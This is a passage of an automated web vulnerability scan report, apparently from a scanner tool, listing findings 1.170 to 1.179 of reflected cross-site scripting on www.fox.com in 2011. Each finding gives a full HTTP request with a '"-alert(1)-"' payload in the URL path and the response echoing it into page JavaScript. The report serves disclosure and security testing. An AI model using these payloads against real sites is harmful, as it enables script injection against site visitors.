User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21868
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player9d142"-alert(1)-"355fb78501bfoxurlsigningplugin"
s_analytics.hier1="fox:shows:_ui:fox_player9d142"-alert(1)-"355fb78501bfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player9d
...[SNIP]...

1.170. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e97"-alert(1)-"09df118e9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swf64e97"-alert(1)-"09df118e9c9/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 21756
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf64e97"-alert(1)-"09df118e9c9"
s_analytics.prop15="sub section:foxurlsigningplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_ana
...[SNIP]...

1.171. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f9a"-alert(1)-"4e380a2135f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_uia5f9a"-alert(1)-"4e380a2135f/fox_player/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 21848
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uia5f9a"-alert(1)-"4e380a2135f:fox_playerggtp370"
s_analytics.hier1="fox:shows:_uia5f9a"-alert(1)-"4e380a2135f:fox_playerggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uia5f9a"-alert(1)-"4e380a213
...[SNIP]...

1.172. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1b9b"-alert(1)-"e54b1cd4320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_playere1b9b"-alert(1)-"e54b1cd4320/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21820
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd4320ggtp370"
s_analytics.hier1="fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd4320ggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd43
...[SNIP]...

1.173. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca774"-alert(1)-"25f577dff3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swfca774"-alert(1)-"25f577dff3d/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21708
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfca774"-alert(1)-"25f577dff3d"
s_analytics.prop15="sub section:ggtp370" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQu
...[SNIP]...

1.174. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4487e"-alert(1)-"727a136ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui4487e"-alert(1)-"727a136ab82/fox_player/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 21872
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui4487e"-alert(1)-"727a136ab82:fox_playeromnituremedia"
s_analytics.hier1="fox:shows:_ui4487e"-alert(1)-"727a136ab82:fox_playeromnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui4487e"-alert(1
...[SNIP]...

1.175. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b5e9"-alert(1)-"8beae5ac93f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player3b5e9"-alert(1)-"8beae5ac93f/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 21844
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player3b5e9"-alert(1)-"8beae5ac93fomnituremedia"
s_analytics.hier1="fox:shows:_ui:fox_player3b5e9"-alert(1)-"8beae5ac93fomnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player3b5e9"-alert(1
...[SNIP]...

1.176. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad80e"-alert(1)-"458de5bad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swfad80e"-alert(1)-"458de5bad2/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.109
Content-Type: text/html; charset=utf-8
Content-Length: 21731
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfad80e"-alert(1)-"458de5bad2"
s_analytics.prop15="sub section:omnituremedia" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics
...[SNIP]...

1.177. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bde97"-alert(1)-"e5dbf06f5fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_uibde97"-alert(1)-"e5dbf06f5fc/fox_player/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.119
Content-Type: text/html; charset=utf-8
Content-Length: 21861
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uibde97"-alert(1)-"e5dbf06f5fc:fox_playervideoxml"
s_analytics.hier1="fox:shows:_uibde97"-alert(1)-"e5dbf06f5fc:fox_playervideoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uibde97"-alert(1)-"e5dbf06
...[SNIP]...

1.178. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36edf"-alert(1)-"96f3cfa2d32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player36edf"-alert(1)-"96f3cfa2d32/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 21833
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa2d32videoxml"
s_analytics.hier1="fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa2d32videoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa
...[SNIP]...

1.179. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575b6"-alert(1)-"e3dfa6a0a2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui575b6"-alert(1)-"e3dfa6a0a2e/js/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%255D%7C1475608962059%3B%20s_vnum%3D1320123600936%2526vn%253D3%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317758115849%3B%20s_dayslastvisit%3D1317756315852%7C1412364315852%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758115852%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21831
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:08:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
